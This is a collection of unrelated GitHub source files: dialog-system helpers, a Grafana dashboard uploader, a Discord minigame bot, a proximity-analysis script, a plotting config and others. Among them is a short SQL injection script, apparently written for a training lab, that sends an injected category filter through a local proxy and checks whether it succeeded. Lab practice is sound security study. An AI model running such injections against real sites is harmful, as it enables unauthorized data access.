    producing a self-referential list rather than the matched subjects.
    """
    subjects = [word for word in splitWords if word in SUBJECTS]
    return subjects or None
def compareInfoEqual(wordlist, keys):
    """Return True when any word in *wordlist* equals any entry in *keys*.

    Bug fix: the original used `is` (object identity), so equal but distinct
    string objects never matched; `==` compares by value.
    """
    return any(word == key for word in wordlist for key in keys)
def wordListFindRequestPredicateInfo(wordlist, old_ents)->dict:
    """Try to infer what the user asks for from segmented words.

    NOTE(review): this function has several latent defects — confirm intent
    before use:
      * findSubjects() can return None, making the comprehension below raise;
      * inform_predicate is a LIST, so using it as a dict key raises TypeError;
      * `for key, val in enumerate(attrs)` iterates dict KEYS with an index;
      * `word is val` compares identity, not equality;
      * ENTITIES_belongs_SUBJECTS is a dict but is CALLED like a function;
      * ent[inform_predicate] indexes a string with a list.
    """
    result =None
    userWants = {}
    subjects = findSubjects(wordlist)
    inform_predicate = [findPredicatesBySubject(wordlist,subject) for subject in subjects]
    ents = findEntities(wordlist)
    # Fall back to the entities carried over from previous turns.
    if ents is None:
        ents = old_ents
    # if subjects:
    #     ents = getEntitesBySubject()
    #     for ent in ents:
    #         ents_info_list.append(ent)
    if ents and inform_predicate:
        userWants.setdefault(inform_predicate, [])
        for ent in ents:
            attrs = getAttrsByEntity(ent)
            for word in wordlist:
                for key, val in enumerate(attrs):
                    if word is val:
                        userWants[inform_predicate].append(ent[inform_predicate])
    elif subjects and inform_predicate:
        # user need ent
        if ents:
            userWants.setdefault(ENTITIES_KEY,[])
            for ent in ents:
                # attrs = getAttrsByEntity(ent)
                predicates = PREDICATES[ENTITIES_belongs_SUBJECTS(ent)]
                if compareInfoEqual(wordlist, predicates):
                    userWants[ENTITIES_KEY].append(ent)
        else:
            ents = getEntitesBySubject(
                subjects)
            userWants.setdefault(ENTITIES_KEY, ents)
    return userWants if len(userWants) else None
def getPredicateInfoByEntityThroughDBs(dbs: tuple, ent: str, predicate: str) -> str:
    """Look up *ent* across all databases and return its value for *predicate*, or None.

    Bug fix: the entity-name comparison used `is` (identity) instead of `==`
    (equality), so runtime-built strings never matched.
    """
    for database in dbs:
        for item in database:
            if item[EntityIndex] == ent:
                return item[AttrsDictIndex][predicate]
    return None
def generateAllSPO(user_split_words,sys_answer_sentence=None):
    """Build [entity, predicate, object] triples for every known entity that
    appears in the (optional) system answer or in the user's segmented words.

    List-valued attributes yield one triple per element; None values are skipped.
    """
    mentioned = []
    if sys_answer_sentence:
        mentioned.extend(w for w in splitSentence(sys_answer_sentence) if w in ENTITIES)
    mentioned.extend(w for w in user_split_words if w in ENTITIES)
    triples = []
    for name in mentioned:
        database = ChooseDataBaseBySubjectName[ENTITIES_belongs_SUBJECTS[name]]
        for record in database:
            if record[EntityIndex] != name:
                continue
            for predicate, obj in record[AttrsDictIndex].items():
                if isinstance(obj, list):
                    triples.extend([name, predicate, part] for part in obj)
                elif obj is not None:
                    triples.append([name, predicate, obj])
    return triples
def patternSubject(wordList):
    """Return the first word in wordList that is a known subject, else None."""
    # next() with a default replaces the manual loop; the enumerate index
    # in the original was never used.
    return next((word for word in wordList if word in SUBJECTS), None)
def patternPredicateWithSubject(wordList,subject):
    """Return PREDICATES[subject] if any word of wordList matches the subject.

    NOTE(review): `word in subject` is a *substring* test on the subject
    string. If an exact match was intended (as in patternSubject/patternEntity)
    this should be `word == subject` — confirm against callers.
    """
    for index, word in enumerate(wordList):
        if word in subject:
            return PREDICATES[subject]
    return None
def patternEntity(wordList):
    """Return the first word in wordList that is a known entity, else None."""
    # next() with a default replaces the manual loop; the enumerate index
    # in the original was never used.
    return next((word for word in wordList if word in ENTITIES), None)
| LOST0LOSER/End-To-End-Dialog-System | utils/DataBase.py | DataBase.py | py | 9,837 | python | en | code | 0 | github-code | 36 |
28981509521 | import json
import traceback
from tendrl.commons.utils import log_utils as logger
from tendrl.monitoring_integration.grafana import constants
from tendrl.monitoring_integration.grafana import dashboard_utils
from tendrl.monitoring_integration.grafana import datasource
from tendrl.monitoring_integration.grafana import exceptions
from tendrl.monitoring_integration.grafana import grafana_org_utils
from tendrl.monitoring_integration.grafana import utils
def upload_default_dashboards():
    """Upload the configured default dashboards to Grafana.

    Switches to Grafana's main organization, creates the datasource, uploads
    every dashboard listed in ``NS.config.data["dashboards"]`` that is not
    already present, and finally marks the configured home dashboard.

    Raises:
        exceptions.ConnectionFailedException: if Grafana is unreachable.
    """
    dashboards = []
    NS.config.data["credentials"] = utils.get_credentials()
    # Initialized up-front so the except handler below cannot hit a
    # NameError when get_org_id itself raises.
    main_org_id = None
    try:
        main_org_id = grafana_org_utils.get_org_id(constants.MAIN_ORG)
        if main_org_id:
            grafana_org_utils.switch_context(
                json.loads(main_org_id)["id"]
            )
    except (exceptions.ConnectionFailedException, KeyError) as ex:
        msg = "Cannot connect to grafana"
        if main_org_id:
            msg = json.loads(main_org_id).get("message", msg)
        logger.log("error", NS.get("publisher_id", None),
                   {'message': msg})
        raise ex
    title = []
    # create datasource
    datasource.create()
    dashboards = dashboard_utils.get_all_dashboards()
    for dashboard_json in dashboards:
        title.append(dashboard_json["uri"].split('/')[1])
    for dashboard_json in NS.config.data["dashboards"]:
        if dashboard_json in title:
            msg = '\n' + "Dashboard " + str(dashboard_json) + \
                " already exists" + '\n'
            logger.log("debug", NS.get("publisher_id", None),
                       {'message': msg})
            continue
        response = dashboard_utils.create_dashboard(dashboard_json)
        if response.status_code == 200:
            msg = '\n' + "Dashboard " + str(dashboard_json) + \
                " uploaded successfully" + '\n'
            logger.log("debug", NS.get("publisher_id", None),
                       {'message': msg})
        else:
            msg = ("Dashboard {0} upload failed. Error code: {1} ,"
                   "Error message: " + "{2} ").format(
                str(dashboard_json),
                str(response.status_code),
                str(get_message_from_response(response)))
            logger.log("debug", NS.get("publisher_id", None),
                       {'message': msg})
    try:
        dashboard_json = dashboard_utils.get_dashboard(
            NS.config.data["home_dashboard"])
        if 'dashboard' in dashboard_json:
            dashboard_id = dashboard_json.get('dashboard').get('id')
            # The original called set_home_dashboard twice back-to-back
            # (copy-paste duplicate); a single call suffices.
            response = dashboard_utils.set_home_dashboard(dashboard_id)
            if response.status_code == 200:
                msg = '\n' + "Dashboard " + \
                    str(NS.config.data["home_dashboard"]) + \
                    " is set as home dashboard" + '\n'
                logger.log("debug", NS.get("publisher_id", None),
                           {'message': msg})
        else:
            msg = '\n' + str(dashboard_json.get('message')) + '\n'
            logger.log("debug", NS.get("publisher_id", None),
                       {'message': msg})
    except exceptions.ConnectionFailedException as ex:
        traceback.print_exc()
        logger.log("error", NS.get("publisher_id", None),
                   {'message': str(ex)})
        raise exceptions.ConnectionFailedException
def get_message_from_response(response_data):
    """Extract the 'message' field from a Grafana HTTP response body.

    Handles both a JSON object body and a JSON array of objects (Grafana
    returns either depending on the endpoint).

    Args:
        response_data: response object exposing a ``content`` attribute
            containing the raw JSON body.

    Returns:
        The message as a string, or "" when the body is missing, not valid
        JSON, empty, or has no 'message' key.
    """
    try:
        # Parse once (the original parsed the body twice) and tolerate
        # malformed/empty bodies: json errors are ValueError subclasses,
        # and an empty list would raise IndexError.
        body = json.loads(response_data.content)
        if isinstance(body, list):
            message = str(body[0]["message"])
        else:
            message = str(body["message"])
    except (AttributeError, KeyError, IndexError, TypeError, ValueError):
        message = ""
    return message
| Tendrl/monitoring-integration | tendrl/monitoring_integration/grafana/dashboard.py | dashboard.py | py | 3,810 | python | en | code | 4 | github-code | 36 |
39489620609 | # dp
# boj-1495 기타리스트 문제와 유사. 각 항목에서 더하거나 빼거나
# Count the number of ways to place +/- between the first n-1 numbers so the
# running total stays within [0, 20] at every step and equals the last number.
n = int(input())
nums = [int(tok) for tok in input().split()]

# ways[i][t] = number of sign assignments over nums[1..i] reaching total t
ways = [[0] * 21 for _ in range(n + 1)]
ways[0][nums[0]] = 1

for idx in range(1, n - 1):
    step = nums[idx]
    for total in range(21):
        count = ways[idx - 1][total]
        if not count:
            continue
        if total - step >= 0:
            ways[idx][total - step] += count
        if total + step <= 20:
            ways[idx][total + step] += count

# The last number is the target value of the expression.
print(ways[n - 2][nums[-1]])
| bangalcat/Algorithms | algorithm-python/boj/boj-5557.py | boj-5557.py | py | 533 | python | ko | code | 1 | github-code | 36 |
25994684161 | import discord
from discord.ext import commands
import asyncio
import random
import datetime
import traceback
import os, sys
# Cog bundling quick mini-game commands: an emoji minesweeper and a slot
# machine. The Japanese cog/command strings are user-facing and kept as-is.
class Game(commands.Cog, name='一息ゲームコマンド'):
    def __init__(self, bot):
        self.bot = bot
    @commands.command()
    async def mine(self, ctx):
        """ 14x14のマインスイーパを生成するぞ! """
        # (help text above: "generates a 14x14 minesweeper grid")
        bomb_list = []
        # keycap emoji for counts 0-9; 9 is used internally to mark a bomb
        num_dict = { 0 : '0⃣', 1 : '1⃣', 2 : '2⃣', 3 : '3⃣', 4 : '4⃣', 5 : '5⃣', 6 : '6⃣', 7 : '7⃣', 8 : '8⃣', 9 : '9⃣'}
        # 8-neighbourhood offsets
        search_list = ((-1, -1), (0, -1), (1, -1),
                        (-1, 0), (1, 0),
                        (-1, 1), (0, 1), (1, 1))
        X = 14
        Y = 14
        # place bombs: each cell has a 1-in-5 chance of holding a bomb (9)
        for y in range(Y):
            bomb_list.append([9 if random.randint(0, 4) == 1 else 0 for i in range(X)])
        # fill non-bomb cells with the count of adjacent bombs
        for y in range(Y):
            for x in range(X):
                count = 0
                if bomb_list[y][x] != 9:
                    for s_ptr in search_list:
                        tmp_x = x + s_ptr[0]
                        tmp_y = y + s_ptr[1]
                        if 0 <= tmp_x < X and 0 <= tmp_y < Y:
                            if bomb_list[tmp_y][tmp_x] == 9:
                                count += 1
                    bomb_list[y][x] = count
        # render the grid as spoiler-tagged emoji text
        mine_data = ''
        for bomb_ptr in bomb_list:
            #print(bomb_ptr)
            for bomb in bomb_ptr:
                if bomb == 9:
                    mine_data += '||#⃣||'
                else:
                    mine_data += '||'+ num_dict[bomb] + '||'
            mine_data += '\r\n'
        mine_txt = await ctx.send(mine_data)
        await mine_txt.add_reaction('😰')
        # reveal-answer loop: 😰 reaction from the invoker uncovers the grid
        def check(reaction, user):
            emoji = str(reaction.emoji)
            if user.bot == True: # ignore bots
                pass
            else:
                return emoji == '😰'
        while not self.bot.is_closed():
            try:
                reaction, user = await self.bot.wait_for('reaction_add', timeout=600, check=check)
            except asyncio.TimeoutError:
                await mine_txt.add_reaction('😪')
                break
            else:
                if ctx.author.id != user.id:
                    continue
                # re-render with safe cells uncovered (bombs stay spoilered)
                mine_data = ''
                for bomb_ptr in bomb_list:
                    #print(bomb_ptr)
                    for bomb in bomb_ptr:
                        if bomb == 9:
                            mine_data += '||#⃣||'
                        else:
                            mine_data += num_dict[bomb]
                    mine_data += '\r\n'
                await mine_txt.edit(content=mine_data)
                await mine_txt.add_reaction('😪')
                break
    @commands.command()
    async def slot(self, ctx):
        """スロットを回すぞ!"""
        # (help text above: "spins the slot machine")
        # Render the 3x3 reel state as bold text.
        def make_slot_txt(s):
            txt = '**'
            for i in range(0, 3):
                txt += '['+ s[i][0] +'] ['+ s[i][1] +'] ['+ s[i][2] +']\r\n'
            return txt + '**'
        # Fill column x with three consecutive items starting at a random offset.
        def set_slot(s, item, x):
            r = random.randint(0, 8)
            for i in range(0, 3):
                s[i][x] = item[r]
                r += 1
                if r > 8: r = 0
            return s
        # initial hidden state
        s = [['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️']]
        item = ['7⃣', '🔔', '🍉', '🍌', '🍋', '🍊', '🍒', '🍇', '🎰']
        # maps reel-selection reactions to column indices
        num = { '0⃣' : 0, '1⃣' : 1, '2⃣' : 2 }
        slot_txt = await ctx.send(make_slot_txt(s))
        await slot_txt.add_reaction('0⃣')
        await slot_txt.add_reaction('1⃣')
        await slot_txt.add_reaction('2⃣')
        def check(reaction, user):
            emoji = str(reaction.emoji)
            if user.bot == True: # ignore bots
                pass
            else:
                return emoji == '0⃣' or emoji == '1⃣' or emoji == '2⃣' or emoji == '🔄'
        cnt = 0
        index_list = []
        # game loop: invoker picks each column once; 🔄 resets the machine
        while not self.bot.is_closed():
            try:
                reaction, user = await self.bot.wait_for('reaction_add', timeout=60, check=check)
            except asyncio.TimeoutError:
                await slot_txt.add_reaction('😪')
                break
            else:
                if ctx.author.id != user.id:
                    continue
                if str(reaction.emoji) == '🔄':
                    # reset to the hidden state
                    index_list = list()
                    cnt = 0
                    s = [['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️'], ['㊙️', '㊙️', '㊙️']]
                    await slot_txt.edit(content=make_slot_txt(s))
                    continue
                cnt += 1
                index = num[str(reaction.emoji)]
                if index not in index_list:
                    index_list.append(index)
                    s = set_slot(s, item, index)
                    await slot_txt.edit(content=make_slot_txt(s))
                if cnt >= 3:
                    # all three reels spun: offer the reset reaction
                    await slot_txt.add_reaction('🔄')
def setup(bot):
bot.add_cog(Game(bot)) | hirosuke-pi/DiscordBot | progracat/mods/game/main.py | main.py | py | 5,289 | python | en | code | 0 | github-code | 36 |
10513629088 | #import getopt
import sys
#import ast
import json
import formatingDataSetProximity as formating
import enumerateTrackersProximity as et
import distancesProximity as distances
import visualisationProximity as vis
from datetime import datetime
from time import gmtime, strftime
import pandas as pd
def main():
    """Entry point invoked from Node with three (or four) JSON argv payloads:

    argv[1] (A): rule info  — id, value_of_mag (graph type / centered role),
                 id_session
    argv[2] (B): two phase records with 'time_action' timestamps
    argv[3] (C): role records — id_object, serial, name, coordinates
    argv[4] (D): bed coordinates (only for the 'Priority' bar-chart mode)

    Dispatches to createBarChar (Priority) or initAnalisis (graph modes).
    """
    # intimate, personal, social, public
    #personal validate distances (0.46-1.2m)
    proxemic='intimate'
    proxemic2='intimate'
    patientIDDevice=''
    #folderData='/Users/13371327/Documents/Gloria/2020/RulesApp/obs-rules/server/routes/localisation/data';
    folderData = 'server/routes/localisation/data'
    #print(folderData);
    roles = {}
    coordinates={}
    centeredRole=''
    A= json.loads(str(sys.argv[1]))
    B= json.loads(str(sys.argv[2]))
    C= json.loads(str(sys.argv[3]))
    # GETTING PARAMETERS FROM NODE
    #ID rule
    idRule = A[0]['id']
    #TYPE OF GRAPH
    typeOfGraph = A[0]['value_of_mag']
    spetialSim=''
    if typeOfGraph == 'Priority':
        spetialSim='barchar'
    # NOTE(review): when typeOfGraph is 'Priority' the next else still maps
    # it to 'role-centered'; the barchar branch below ignores typeOfGraph,
    # so this is harmless but confusing — confirm intended.
    if typeOfGraph == 'All':
        typeOfGraph='full'
    else:
        typeOfGraph='role-centered'
    #PHASES
    myFormat = '%Y-%m-%d %I:%M:%S'
    phase1 = B[0]['time_action']
    phase2 = B[1]['time_action']
    #print('dates in the python script: ', phase1, phase2)
    #phase1 = datetime.strptime(phase1.split('.')[0], myFormat)
    #phase2 = datetime.strptime(phase2.split('.')[0], myFormat)
    #print('dates in the python script AFTER : ', phase1, phase2)
    #CENTERED ROLE
    if typeOfGraph == 'role-centered':
        #print('The value of the center role: ', A[0]['value_of_mag'])
        if(A[0]['value_of_mag'] is None or A[0]['value_of_mag']== '' or A[0]['value_of_mag']== 'null'):
            centeredRole='11111'
        else:
            centeredRole= A[0]['value_of_mag']
    else:
        centeredRole=0
    # ROLES
    #print('centeredRole value: ', centeredRole)
    #7 is the patient role according to the web tool
    # NOTE(review): patientcoordinates is only bound inside this branch;
    # if no role has id_object == 7 the initAnalisis call below raises
    # NameError — confirm a patient role is always present.
    for x in range(len(C)):
        if (C[x]['id_object']) == 7:
            patientIDDevice = C[x]['serial']
            patientcoordinates = C[x]['coordinates']
            # NOTE(review): both branches below are identical; the if/else
            # on centeredRole is redundant as written.
            if(centeredRole=='11111'):
                roles[x] = C[x]['name'] + ',' + '11111'
            else:
                roles[x] = C[x]['name'] + ',' + '11111'
            #print('Here is the patient information: ',patientIDDevice, patientcoordinates, roles[x])
        else:
            roles[x] = C[x]['name'] + ',' + C[x]['serial']
            #print(roles[x])
    #print('After the loop: ',patientIDDevice)
    # WHICH SESSION
    session = A[0]['id_session']
    file = folderData + '/' + str(session) + '.json'
    #print(A, B, str(sys.argv[3]));
    #print(typeOfGraph, phase1, phase2, centeredRole, len(C), roles, session);
    # Reminder: to know who the patient is, use the roles dictionary
    #print(typeOfGraph, phase1, phase2, centeredRole, len(C), roles, session);
    if(spetialSim=='barchar'):
        #print('Here we are about to generate a barchar')
        D = json.loads(str(sys.argv[4]))
        #COORDINATES
        for x in range(len(D)):
            coordinates[x] = D[x]['coordinates']
        #print('This is the first group of coordinates: ', D[0]["coordinates"], D[0]["name"])
        createBarChar(file, session, coordinates,proxemic, phase1, phase2, idRule, patientIDDevice)
    else:
        initAnalisis(file, centeredRole, proxemic, proxemic2, phase1, phase2, roles, typeOfGraph, session, idRule, patientIDDevice, patientcoordinates)
def initAnalisis(file, centeredRole, proxemic,proxemic2, phase1, phase2, roles, typeOfGraph, session, idRule, patientIDDevice, patientcoordinates):
    """Build and render a proximity social-network graph for one session.

    Pipeline: read tracker data -> (optionally inject/remove the patient)
    -> filter rows to the [phase1, phase2] window -> compute pairwise
    distances -> label them with proxemic zones -> aggregate -> draw either
    a full graph or a role-centered graph. Prints a JSON response
    {message, path, messageError} for the Node caller.
    """
    #READ DATA
    df = formating.readingDataJson(file,session)
    #print('Alll the variables I want to know: ',centeredRole, patientcoordinates, patientIDDevice);
    # Full graph: drop the patient's own tracker rows if one was tracked.
    # NOTE(review): bitwise & is used between boolean expressions here;
    # it works because each side is parenthesised, but `and` would be safer.
    if ((not(patientIDDevice is None)) & (patientIDDevice != '')) & (typeOfGraph=='full'):
        query = 'tracker !=' + patientIDDevice
        df = df.query(query)
    if (typeOfGraph=='role-centered'):
        # Add the patient info into the dataFrame
        if(not(patientcoordinates is None)) & (centeredRole=='11111'):
            #create a small dataFrame with the patient info
            #the tagId is 0000
            #print('Good the patient coordinate and the centered role is patient', centeredRole, patientcoordinates)
            start = df['timestamp'].iloc[0]
            # last value
            end = df['timestamp'].iloc[-1]
            dfPatient= formating.creatingTimestampColumns(start, end, patientcoordinates, session)
            #Concat the new dataFrame with the one that was read in the first line
            frames = [dfPatient, df]
            df = pd.concat(frames, sort=True)
            df = df.reset_index()
            #print(df);
        elif (patientcoordinates is None):
            # Cannot center on the patient without coordinates: report and
            # fall through (NOTE(review): execution continues after this).
            response = {"message": 'none', "path": 'none', "messageError": 'Please set the patient coordinate or the role serial tracker'}
            json_RESPONSE = json.dumps(response)
            print(json_RESPONSE)
    #FORMATING
    #session = session;
    #FILTER DATA ACCORDING TO PHASES
    df1= formating.nameTrackers(df, roles)
    #print(df.loc[df['tracker'] == 26689])
    #print(df1.Role.unique())
    #print(df1)
    #GET NUMBER OF TRACKERS
    n = et.numberTrackers(df1)
    #print ('number of trackers', n)
    #print (roles)
    #print ('BEFORE FILTERING: ',len(df.index))
    #FILTERING PER PHASE
    #df = formating.asign_phases(df, phase1, phase2)
    df, toSend = formating.filteringPhases(df1, phase1, phase2)
    #Total of seconds
    #print('This is the data number of rows: ',len(df.index))
    totalSeconds = len(df.index)
    # Retry the phase filter with timezone-adjusted variants when the first
    # attempt matched no rows.
    if df.empty:
        #print('No matching rows: ', toSend);
        df, toSend= formating.filteringPhasesAdding(df1, phase1, phase2)
        if df.empty:
            df, toSend = formating.filteringPhasesMinosTimeZone(df1, phase1, phase2)
            if df.empty:
                df, toSend = formating.filteringPhasesMinosTimeZone1(df1, phase1, phase2)
                #print(toSend)
    #print(df, toSend)
    #print('This is the data filtered dataframe: ',df.Role.unique(), df)
    # Call the function that enumerates trackers
    df_trackers = et.enumerate_trackers(df)
    #print('df_trackers: $$$$$',df_trackers)
    df = et.asignEnumTrackers(df, df_trackers)
    #print('Assign enum trackers: $$$$$',df)
    # HERE I NEED TO KNOW HOW MANY SECONDS THIS SECTION OF THE SIMULATION LAST
    #print ('AFTER FILTERING: ',len(df.index))
    # WHICH TRACKER IS THE SELECTED ROLE, returns the enum tracker
    #print('Here is the center role value: ',centeredRole)
    centeredRole = formating.roleNum(df, df_trackers, centeredRole)
    #print('Enum for the selected role in the miedle: $$$$$', centeredRole)
    ## DISTANCES
    # To run the calculation of distances it requires the number of trackers and the dataset
    df_distancesBetTrackers = distances.distancesBetweenTrackers(df, n)
    #print('Distances between trackers: $$$$$', df_distancesBetTrackers)
    #print(df_distancesBetTrackers.head(10))
    # The next steep is to asign proxemic labels according to the distances
    df_proxemic_labels, prox_labels = distances.proxemicsLabels(df_distancesBetTrackers, n)
    #print('Labels according to the distance: $$$$$', df_proxemic_labels, prox_labels)
    #print(df_proxemic_labels, prox_labels)
    # Agregate the proxemic labels per session
    df = vis.aggregateLabels(df_proxemic_labels, prox_labels)
    #print('Agregation of the proxemic labels', df.head(5))
    if (typeOfGraph == 'full'):
        #print(df.head(10))
        filterProxemic = vis.filterPL(df, proxemic, proxemic2, role=0)
        # trackers_names = vis.nameTrackers(df, listRoles)
        #df_trackers_ordered = vis.orderTrackers(centeredRole, df_trackers)
        trackers_names = vis.nameTrackers(df_trackers, roles)
        #trackers_names = vis.nameTrackers(df_trackers, roles)
        #filterProxemic = vis.filterPL(df, proxemic,proxemic2, role=0)
        graph, message = vis.generateFullGraph(filterProxemic, trackers_names)
        name = vis.visualiseGraph1(graph, session, 'porcentages', proxemic, idRule)
        response = {"message": message, "path": name, "messageError": "none"}
        json_RESPONSE = json.dumps(response)
        print(json_RESPONSE)
        # Indicators of centrality
        #print('GRAPH DEGREE: ', vis.graphDegree(graph))
        #print('VERTEX 1 DEGREE: ', vis.vertexDegree(1, graph))
        #print('EDGE DEGREE: ', vis.edgeBetweennes(graph))
        #print('VERTEX DEGREE: ', vis.vertexBetweennes(graph))
        #print('LARGEST BETWEENESS: ', vis.largestBetweeness(graph, 'tracker'))
        #print('PAGE RANK: ', vis.pageRabk(graph))
        #print('PERSONALISE PAGE RANK: ', vis.PpageRabk(graph, 'proxLabel'))
    else:
        # Filtering data according to proxemic label of interest and the role
        filterProxemic = vis.filterPL(df, proxemic, proxemic2, centeredRole)
        #totalSeconds = len(filterProxemic.index)
        #print('Filter the data according to the proxemic label: ',filterProxemic)
        # Once we have the proxemic labels we can try to plot the SN
        df_trackers_ordered = vis.orderTrackers(centeredRole, df_trackers)
        #print(df_trackers_ordered)
        trackers_names = vis.nameTrackers(df_trackers_ordered, roles)
        #print('NAME TRACKERS: @@@@ ',trackers_names)
        #print('ORDERED TRACKERS: @@@@ ', df_trackers_ordered)
        # VISUALISE
        # visualise normalized data and porcentages
        dfnorm = vis.normalizedata(filterProxemic)
        #print(dfnorm)
        graph, message = vis.graphDefinition(dfnorm, trackers_names, 'porcentages')
        #print(graph)
        name = vis.visualiseGraph1(graph, session, 'porcentages', proxemic, idRule)
        response = {"message":message, "path":name, "messageError": "none"}
        json_RESPONSE = json.dumps(response)
        print(json_RESPONSE)
def createBarChar(file, session, coordinates,proxemic, phase1, phase2, idRule, patientIDDevice):
    """Render a bar chart of how long each role spent in proximity of each bed.

    Reads the session's tracker data, drops the patient's own tracker,
    restricts to the [phase1, phase2] window, computes role-to-bed distances,
    labels them with proximity zones, aggregates per bed, and plots.
    Prints a JSON response {message, path, messageError} for the Node caller.
    """
    #Read the file
    df1 = formating.readingDataJson(file, session)
    #Remove the patient' data from the dataFrame, if it was tracked
    #print('Patient ID device', patientIDDevice)
    #print(df1.head(10), df1.tracker.unique(), phase1, phase2)
    if (patientIDDevice!='') & (not(patientIDDevice is None)):
        query='tracker !=' + patientIDDevice
        df1 = df1.query(query)
    #FilterDataSet
    # Same timezone-fallback cascade as in initAnalisis.
    df, toSend = formating.filteringPhases(df1, phase1, phase2)
    if df.empty:
        # print('No matching rows: ', toSend);
        df, toSend = formating.filteringPhasesAdding(df1, phase1, phase2)
        if df.empty:
            df, toSend = formating.filteringPhasesMinosTimeZone(df1, phase1, phase2)
            if df.empty:
                df, toSend = formating.filteringPhasesMinosTimeZone1(df1, phase1, phase2)
                #print(toSend)
    #print(df.tracker.unique(), toSend, df)
    #print('This is the data number of rows: ',len(df.index))
    #Calculate distancesRolesAndBeds
    df = distances.calculateDistancesRolesToBeds(df, coordinates)
    #Were they in intimate proxemity with the patient asign label?
    numberOfPatients = len(coordinates)
    #print('The number of patients is: ', numberOfPatients);
    # careful with this functions of do you want to validate different distances. works only for intimate and personal
    df = distances.asignProximityLabel(df, numberOfPatients)
    #Agregate values according to the proximity of each patient Create a summary
    # bed 1: %, bed 2: %, bed 3: %
    itemsPlot, message, indexMax=distances.aggregateProximity(df, proxemic, numberOfPatients)
    name = vis.plotBarChart(itemsPlot, session, idRule, indexMax)
    response = {"message": message, "path": name, "messageError": "none"}
    json_RESPONSE = json.dumps(response)
    print(json_RESPONSE)
if __name__ == "__main__":
    # execute only if run as a script (Node spawns this module directly)
    main()
| Teamwork-Analytics/obs-rules | server/routes/localisation/ProximityLocalisation.py | ProximityLocalisation.py | py | 10,895 | python | en | code | 1 | github-code | 36 |
32676816163 | import requests
import sys
import urllib3
from requests_toolbelt.utils import dump
# Suppress the InsecureRequestWarning spam caused by verify=False requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Route all traffic through a local intercepting proxy (e.g. Burp Suite).
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def exploit_sqli(url, payload):
    """Send the SQL injection payload via the category filter endpoint.

    Dumps the full request/response to stdout, then reports success:
    the lab page references ".svg" assets whenever product rows came back.

    Args:
        url: base URL of the target (trailing slash expected).
        payload: raw value appended to the `category` query parameter.

    Returns:
        True when the injection returned results, False otherwise.
    """
    target = url + 'filter?category=' + payload
    response = requests.get(target, verify=False, proxies=proxies)
    print(dump.dump_all(response).decode('utf-8'))
    if ".svg" in response.text:
        return True
    return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
payload = sys.argv[2].strip()
except IndexError:
print("[-] Usage: %s <url> <payload>" % sys.argv[0])
print('[-] Example: %s www.example.com "1=1"' % sys.argv[0])
sys.exit(-1)
if exploit_sqli(url, payload):
print("[+] SQL injection successful!")
else:
print("[-] SQL injection unsuccessful!")
| marcomania/Web-Security-Academy-Series | sql-injection/lab-01/sqli-lab-01.py | sqli-lab-01.py | py | 934 | python | en | code | 0 | github-code | 36 |
73743833704 | import re
import logging
import ROOT
import plottingConfig as cfg
class Config(cfg.PlottingConfig):
    def __init__ (self, options):
        """Configure the A->Zh plotting machinery.

        Sets output formats, blinding, signal/background styling (legend
        label, priority, ROOT color, merge partners), yield-table priorities,
        covariance-matrix groupings and category-condensing rules used by the
        parent PlottingConfig.
        """
        self.options = options
        super(Config, self).__init__()
        # NOTE(review): sigma/sigma_units are only referenced from the
        # commented-out expected_signal label below.
        sigma = 1 # at mu=1 (arbitrary for AZh)
        sigma_units = 'fb'
        # self.force_mu = (True, 0.16) # 700 GeV
        self.force_mu = (True, 10) # 600 GeV
        # for child classes to use
        # self.loggingLvl = logging.INFO
        self.loggingLvl = logging.DEBUG
        self.verbose = False
        self.formats = [ 'eps', 'pdf', 'png', 'root', 'C' ]
        self.blind = True
        self.thresh_drop_legend = 0.01
        self.restrict_to = []
        self.excludes = []
        self.additionalPlots = []
        self.add_sig_to_ratio_plot = True
        self.use_exp_sig = True
        # self.transferResults_fitName = "HiggsNorm"
        # self.get_binning_hist_removal = ["_meas2l2q2v2q"]
        self.bkg_substr_name = "Diboson"
        self.bkg_substr_list = ["diboson", "Diboson", "WZ", "ZZ", "VZ"]
        self.file_tags = ["Y", "L", "J", "T", "TType", "Flv", "Sgn", "isMVA", "dist", "Spc", "D", "nAddTag", "BMax", "BMin", "Fat", "incFat", "incJet", "incAddTag"]
        self.weight_tags = ["Higgsweighted", "Dibosonweighted"]
        self.sig_names = ["VH"]
        self.signal = ["A#rightarrow Zh (best fit)", self._STACK, ROOT.kRed + 1, 1] # last = mult factor
        self.expected_signal = ["VHbb", self._STACK, ROOT.kRed +1, self.force_mu[1]] # last = expected mu
        #self.expected_signal = ["A#rightarrow Zh (#sigma={0} {1})".format(int(sigma*self.force_mu[1]), sigma_units), self._STACK, ROOT.kRed +1, self.force_mu[1]] # last = expected mu
        # self.additional_signal = ["A#rightarrow Zh", self._OVERPRINT, ROOT.kRed +1, 1.]
        # bkg name -> (legend label, priority, ROOT color, merge partners)
        self.bkg_tuple = {'ttbar': ("t#bar{t}", 42, ROOT.kOrange, []),
                          'stopt': ("t, s+t chan", 41, ROOT.kOrange - 1, ["stops"]),
                          'stops': ("t, s+t chan", 41, ROOT.kOrange - 1, ["stopt"]),
                          'stopWt': ("Wt", 40, ROOT.kYellow - 7, []),
                          'stop': ("Single top", 40, ROOT.kOrange - 1, []),
                          'Zbb': ("Z+bb", 25, ROOT.kAzure + 3, []),
                          'Zbc': ("Z+bc", 24, ROOT.kAzure + 2, []),
                          'Zclbl': ("Z+(bl,cl)", 23, ROOT.kAzure + 1, []),
                          'Zbl': ("Z+bl", 23, ROOT.kAzure + 1, []),
                          'Zcl': ("Z+cl", 21, ROOT.kAzure - 8, []),
                          'Zcc': ("Z+cc", 22, ROOT.kAzure - 4, []),
                          'Zhf': ("Z+(bb,bc,cc)", 22, ROOT.kAzure + 2, []),
                          'Zl': ("Z+l", 20, ROOT.kAzure - 9, []),
                          'Wbl': ("W+bl", 33, ROOT.kGreen + 2, []),
                          'Wbb': ("W+bb", 35, ROOT.kGreen + 4, []),
                          'Wbc': ("W+bc", 34, ROOT.kGreen + 3, []),
                          'Wcc': ("W+cc", 32, ROOT.kGreen + 1, []),
                          'Whf': ("W+(bb,bc,cc,bl)", 32, ROOT.kGreen + 3, []),
                          'Wcl': ("W+cl", 31, ROOT.kGreen - 6, []),
                          'Wl': ("W+l", 30, ROOT.kGreen - 9, []),
